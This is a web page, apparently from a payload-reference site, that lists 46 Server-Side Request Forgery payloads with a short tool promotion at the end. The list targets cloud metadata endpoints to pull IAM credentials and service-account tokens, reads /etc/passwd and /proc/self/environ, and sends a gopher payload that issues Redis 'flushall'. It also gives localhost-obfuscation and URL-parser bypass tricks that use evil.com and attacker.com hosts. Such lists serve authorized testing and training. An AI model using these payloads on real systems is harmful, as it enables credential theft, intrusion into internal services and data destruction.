$loading...
Server-Side Request Forgery payloads for accessing internal services, cloud metadata, and bypassing filters. (46 payloads)
http://169.254.169.254/latest/meta-data/http://169.254.169.254/latest/meta-data/iam/security-credentials/http://169.254.169.254/latest/user-datahttp://169.254.169.254/latest/api/tokenhttp://metadata.google.internal/computeMetadata/v1/http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/tokenhttp://169.254.169.254/metadata/instance?api-version=2021-02-01http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/http://100.100.100.200/latest/meta-data/http://169.254.169.254/openstack/latest/meta_data.jsonhttp://127.0.0.1http://0.0.0.0http://0http://2130706433http://0x7f000001http://0177.0.0.1http://[::1]http://[::ffff:127.0.0.1]http://127.1http://127.0.0.1.nip.iohttp://localtest.mehttp://spoofed.burpcollaborator.netfile:///etc/passwdfile:///proc/self/environdict://127.0.0.1:6379/INFOgopher://127.0.0.1:6379/_*1%0d%0a$8%0d%0aflushall%0d%0agopher://127.0.0.1:25/_HELO%20localhost%0d%0aMAIL%20FROM...ldap://127.0.0.1:389/%0astats%0aquittftp://attacker.com/filehttp://evil.com@127.0.0.1http://127.0.0.1#@evil.comhttp://127.0.0.1%00@evil.comhttp://127.0.0.1?@evil.comhttp://evil.com\@127.0.0.1http://127。0。0。1http://①②⑦.⓪.⓪.①http://127.0.0.1:22http://127.0.0.1:6379http://127.0.0.1:11211http://127.0.0.1:27017http://127.0.0.1:9200http://127.0.0.1:3306http://127.0.0.1:5432http://127.0.0.1:8080http://127.0.0.1:8500http://127.0.0.1:2375Level up your security testing
Install the CLI
npx payload-playgroundExplore All Tools
Encoding, hashing, JWT & more
Browse Cheat Sheets
Quick-reference payload guides